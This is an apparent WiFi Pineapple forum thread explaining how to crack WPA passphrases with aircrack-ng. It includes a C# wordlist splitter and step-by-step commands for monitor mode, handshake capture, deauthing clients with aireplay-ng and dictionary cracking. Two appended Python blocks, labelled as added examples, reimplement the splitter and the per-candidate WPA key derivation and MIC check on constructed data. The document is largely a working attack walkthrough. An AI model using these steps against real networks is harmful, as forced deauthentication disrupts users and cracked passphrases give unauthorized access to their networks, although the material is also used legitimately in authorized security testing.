How to use Aircrack on pineapple?


reaper_666


I don't see how to post attachments, so I cannot post my word doc with pictures on this website. The Aircrack-ng documentation will have to suffice.

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

You will need a wordlist which you will have to get elsewhere. I think I got mine here:

http://www.renderlab.net/projects/WPA-tables/

There is also a bug in the Aircrack-ng 1.1 suite (on the pineapple) that does not allow for wordlists larger than 2 GB, so you will need to break up the wordlists into about 1900 MB chunks. I wrote a C# program to do that, but if you use the C# program you will have to use special software to be able to access Linux file systems on Windows. Could somebody write one in C?

/*Author: overwraith*/
using System;
using System.IO;
using System.Text;

namespace SplitFile {

    class Program {

        static void Main(string[] args) {
            //-f "E:\Super-WPA" -s "1900M" -d "E:\Wordlists"
            String usage = "SplitFile.exe -f <fileToSplit> -s <size(G/M/K/B)> -d destination";
            String fname = null;
            long byteSize = 0;
            String destination = "";
            
            {//set up command line arguments
                if(args.Length == 0){
                    Console.WriteLine(usage);
                    Environment.Exit(0);
                }

                for (int i = 0; i + 1 < args.Length; i++) {//every flag takes one value
                    if (args[i] == "-f") {//file
                        fname = args[i + 1];
                    }
                    else if (args[i] == "-s") {//size
                        String str = args[i + 1];

                        if (str.EndsWith("G")) {//Gigabytes
                            long.TryParse(str.TrimEnd('G'), out byteSize);
                            byteSize *= 1024L * 1024 * 1024;
                        }
                        else if (str.EndsWith("M")) {//Megabytes
                            long.TryParse(str.TrimEnd('M'), out byteSize);
                            byteSize *= 1024L * 1024;
                        }
                        else if (str.EndsWith("K")) {//Kilobytes
                            long.TryParse(str.TrimEnd('K'), out byteSize);
                            byteSize *= 1024L;
                        }
                        else {//bytes
                            if (str.EndsWith("B"))
                                long.TryParse(str.TrimEnd('B'), out byteSize);
                            else
                                long.TryParse(str, out byteSize);
                        }
                    }
                    else if (args[i] == "-d")//destination
                        destination = args[i + 1];
                }//end loop

                if (fname == null || byteSize <= 0) {//missing file or unparseable size
                    Console.WriteLine(usage);
                    Environment.Exit(1);
                }
            }

            Console.WriteLine("\t\t***Partitioning file***");
            Console.WriteLine("Target File: " + fname);
            Console.WriteLine("Partition Sizes: " + byteSize);
            Console.WriteLine("Destination: " + destination + "\n");

            {//write the new partitions
                //sizes are counted in UTF-8 bytes (what ends up on disk), not characters,
                //so the limit also holds for wordlists with non-ASCII entries
                using (StreamReader reader = new StreamReader(
                    new BufferedStream(new FileStream(fname, FileMode.Open, FileAccess.Read)))) {
                    String password = null;
                    long counter = 0;
                    int i = 1;

                    while (true) {
                        String partition = Path.Combine(destination, Path.GetFileName(fname) + i.ToString("D2"));
                        StreamWriter writer = new StreamWriter(new BufferedStream(new FileStream(partition, FileMode.Create, FileAccess.Write)));

                        Console.WriteLine("Writing new file: " + partition);

                        //set newline to only "\n", not "\r\n"
                        writer.NewLine = "\n";

                        //write the password caught in-between streams
                        if (password != null) {
                            counter += Encoding.UTF8.GetByteCount(password) + 1;
                            writer.WriteLine(password);
                        }

                        while (( password = reader.ReadLine() ) != null) {
                            long length = Encoding.UTF8.GetByteCount(password) + 1;//+1 for the "\n"

                            //if combined value is greater than limit, then break and get a new stream
                            if (counter + length > byteSize) {
                                //reset counter
                                counter = 0;
                                break;
                            }

                            //accumulate the length
                            counter += length;

                            //write the password
                            writer.WriteLine(password);
                        }//end loop

                        //close (and flush) the partition on both exits from the loop above;
                        //leaving the last one open drops its buffered tail
                        writer.Close();

                        if (password == null)
                            break;

                        i++;
                    }//end loop
                }
            }

        }//end main

    }//end class

}//end namespace

The software I used to access Linux file systems on Windows is:

http://www.ext2fsd.com/

You should move the actual cracking operation onto a desktop computer, because the pineapple is a little lacking in processing power.

Also, I do not have the benefit of having enough hardware for a Linux box at the moment, but you should plan on making a Linux laptop or something, probably Kali Linux. Others might have a better procedure in mind.

Edited by overwraith
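The post above asks for a C version of the splitter. The following is an added example, not overwraith's program and not part of the thread: the same line-boundary split written in Python so it can run on the Linux box you crack from, beside the wordlist, with no ext2 driver involved. It counts UTF-8 bytes rather than characters so the per-chunk limit actually holds for non-ASCII entries, rewrites CRLF line endings to LF, closes every chunk so the last one is not left unflushed, and checks the result. The sample wordlist in `demo()` is constructed; the 20-byte limit is only there to show a split on a tiny input.

```python
"""Added example: split a wordlist into chunks under a byte limit without cutting a line."""
import os
import tempfile

UNITS = {"G": 1024 ** 3, "M": 1024 ** 2, "K": 1024, "B": 1}


def parse_size(text):
    """Parse a size like '1900M', '2G', '512K', '100B' or '100' into bytes."""
    text = text.strip().upper()
    if text and text[-1] in UNITS:
        return int(text[:-1]) * UNITS[text[-1]]
    return int(text)


def split_wordlist(src_path, dst_dir, limit):
    """Write src_path to dst_dir/<name>01, <name>02, ... each at most `limit` bytes.
    Reads and counts in bytes (so UTF-8 candidates are measured correctly), normalises
    CRLF to LF, and never splits a line. A single line longer than `limit` is written
    on its own and will exceed the limit. Returns the chunk paths in order."""
    if limit < 2:
        raise ValueError("limit must be at least 2 bytes")
    base = os.path.basename(src_path)
    chunks, out, used = [], None, 0
    with open(src_path, "rb") as src:
        for raw in src:
            line = raw.rstrip(b"\r\n") + b"\n"
            if out is None or used + len(line) > limit:
                if out is not None:
                    out.close()  # close each chunk explicitly so its buffer is flushed
                path = os.path.join(dst_dir, "%s%02d" % (base, len(chunks) + 1))
                out = open(path, "wb")
                chunks.append(path)
                used = 0
            out.write(line)
            used += len(line)
    if out is not None:
        out.close()
    return chunks


def check_split(src_path, chunks, limit):
    """Verify the split: every chunk fits the limit and ends in a newline, and the chunks
    concatenate back to the LF-normalised source."""
    joined = b""
    for path in chunks:
        with open(path, "rb") as f:
            data = f.read()
        if len(data) > limit or not data.endswith(b"\n"):
            return False
        joined += data
    with open(src_path, "rb") as f:
        expected = b"".join(l.rstrip(b"\r\n") + b"\n" for l in f)
    return joined == expected


def demo():
    """Split a constructed CRLF wordlist with a 20-byte limit; returns (chunk sizes, check ok)."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "words.txt")
    with open(src, "wb") as f:  # constructed sample: one candidate has non-ASCII characters
        f.write(b"password\r\nletmein\r\n\xc3\xa9t\xc3\xa9123\r\nsecret\r\n")
    limit = parse_size("20B")
    chunks = split_wordlist(src, work, limit)
    return [os.path.getsize(c) for c in chunks], check_split(src, chunks, limit)


if __name__ == "__main__":
    print(demo())  # ([17, 16], True)
```

For the real case call `split_wordlist("/path/to/wordlist", "/path/to/out", parse_size("1900M"))`; the "password caught in-between streams" handling from the C# version disappears because a line is only written after the decision about which chunk it belongs to.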

Aircrack-ng 1.1 is already installed on the pineapple; it is just an old version.

Note that AP stands for access point and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols.

#Turn on injection radio
ifconfig wlan1 up
#Use this to check
ifconfig

#turn off airmon if it is already on
airmon-ng stop wlan1
#turn on airmon, provide it with wlan1
airmon-ng start wlan1
#on builds where airmon-ng reports a separate monitor interface (e.g. mon0), use that name in place of wlan1 below

#scan APs in the area
#note the channel of the AP you want to attack, and its MAC address
iwlist wlan0 scan

#turn on airodump
airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1
...
#A nifty screen appears; if no stations are present, pack up and try again tomorrow, you need populated APs to collect a handshake

#open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen
#Do this to about 3 clients if you can; the 100 count will keep deauthing them for a while, only deauth as much as you need
#I found that I had to deauth more because my AP and the clients ignore a number of deauths.
aireplay-ng -0 100 -a <AP MAC> -c <Client MAC>

#back on the airodump screen there should be a WPA handshake hash that appears on the top right hand side of the screen
#kill the program after you get the handshake, it has done its job

#finally the cracking process begins
aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap>
#a screen with the current passphrase, master key, transient key, and EAPOL HMAC should appear; it will test until it finds the right phrase

I have a Windows machine, which is bad, so I PuTTY in; you will probably use ssh or something.

Edited by overwraith

Make sure wlan1 is down, otherwise you cannot channel hop.

Best regards,

Sebkinne
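The last step in the procedure above, `aircrack-ng -w <wordlist> -b <AP MAC> <capfile.cap>`, is where the "master key, transient key, EAPOL HMAC" columns come from. The block below is an added example, not from the thread and not aircrack-ng's code: it performs the same per-candidate derivation, PMK from the passphrase and SSID, PTK from the PMK plus the two MAC addresses and two nonces, then the Key MIC over EAPOL message 2, and stops at the candidate whose MIC matches the captured one. The PMK for passphrase "password" and SSID "IEEE" matches the published 802.11i Annex H test vector; the MAC addresses, nonces and EAPOL frame are constructed here (no real capture), so the handshake half only shows the loop is self-consistent. A WPA2 handshake (key descriptor version 2, HMAC-SHA1) is assumed by default; version 1 (WPA, HMAC-MD5) is handled too.

```python
"""Added example: the work aircrack-ng does per candidate passphrase for WPA/WPA2-PSK."""
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the Key MIC


def pmk_from_passphrase(passphrase, ssid):
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the slow step; it is why the cracking loop is CPU bound."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce, length=48):
    """Pairwise Transient Key via the 802.11i PRF: HMAC-SHA1 blocks over
    "Pairwise key expansion" || 0x00 || min(MACs) || max(MACs) || min(nonces) || max(nonces) || i.
    The first 16 bytes are the KCK, the key that authenticates the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck, eapol_frame, version):
    """Key MIC over the EAPOL-Key frame with its own MIC field zeroed. Descriptor version 1
    (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    algo = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, algo).digest()[:16]


def crack(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, version):
    """Return the first candidate whose KCK reproduces the captured MIC, or None."""
    captured = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # WPA-PSK passphrases are 8..63 characters; skip the rest
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, version), captured):
            return cand
    return None


def build_eapol_msg2(snonce, mic=b"\x00" * 16, version=2):
    """Constructed EAPOL-Key message 2 of 4 (client -> AP): RSN descriptor, MIC and Pairwise
    bits set in Key Information, replay counter 1, no key data."""
    key_info = (0x0100 | 0x0008 | version).to_bytes(2, "big")
    body = (b"\x02" + key_info + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


# Constructed handshake material (not from any real capture).
SSID = b"IEEE"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def make_capture(passphrase, version=2):
    """Stand-in for the handshake airodump-ng would save: message 2 with a MIC under `passphrase`."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE, version=version)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned, version), version)


if __name__ == "__main__":
    # PMK for ("password", "IEEE") matches the 802.11i Annex H test vector.
    print("PMK:", pmk_from_passphrase("password", SSID).hex())
    frame = make_capture("password")
    words = ["letmein", "Password", "short", "12345678", "password", "dragon"]
    print("KEY FOUND:", crack(words, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, frame, 2))
```

Two things this makes concrete for the procedure above: the capture only needs to contain the nonces and one MIC-bearing EAPOL message (which is why a single deauth-triggered reconnect is enough), and the cost per candidate is dominated by the 4096-round PBKDF2, which is the reason to move the wordlist run off the pineapple.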
